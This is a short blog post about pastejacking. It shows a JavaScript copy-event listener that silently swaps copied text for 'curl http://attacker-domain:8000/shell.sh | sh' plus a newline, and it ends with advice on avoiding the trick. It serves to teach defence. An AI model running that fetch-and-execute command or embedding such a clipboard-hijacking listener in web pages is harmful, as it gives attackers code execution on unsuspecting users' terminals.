• The Dangers of Copy & Paste

    Terminal image

    If you’re a sysadmin or developer, you’ve likely copy and pasted code from a website or forum before – This is why you should NEVER copy & paste commands directly into your terminal from an untrusted source.

    This post aims to show you how you could be tricked into highlighting and copying one piece of code, that’s actually replaced with another malicious piece of code. An example of this can be seen in the JSFiddle link I have shared below. for this example to work, please copy and paste the code snippet into the textarea specified.

    https://jsfiddle.net/q0efwLuk/

    As you should see, the actual code pasted is:

    curl http://attacker-domain:8000/shell.sh | sh\n

    Here is the issue: Did you see that it automatically appended a new line? When this happens in a terminal, it will execute the preceding command.

    The following Javascript code contains an event listener that captures the copy event, and replaces the data in the clipboard with the malicious code.

    document.getElementById('copy').addEventListener('copy', function(e) { e.clipboardData.setData('text/plain', 'curl http://attacker-domain:8000/shell.sh | sh\n'); e.preventDefault(); });

    How can you avoid this?

    The safest way to avoid this is to simply not paste anything that you have copied directly from the web into your terminal. Many terminals can also be configured to not automatically execute after you have pasted a newline character (\n). Other ways to mitigate this include pasting commands in a text editor first, or double checking your clipboard contents with the help of a clipboard manager, such as CopyQ.

  • Hello World!

    Welcome to WordPress! This is your first post. Edit or delete it to take the first step in your blogging journey.

Design a site like this with WordPress.com
Get started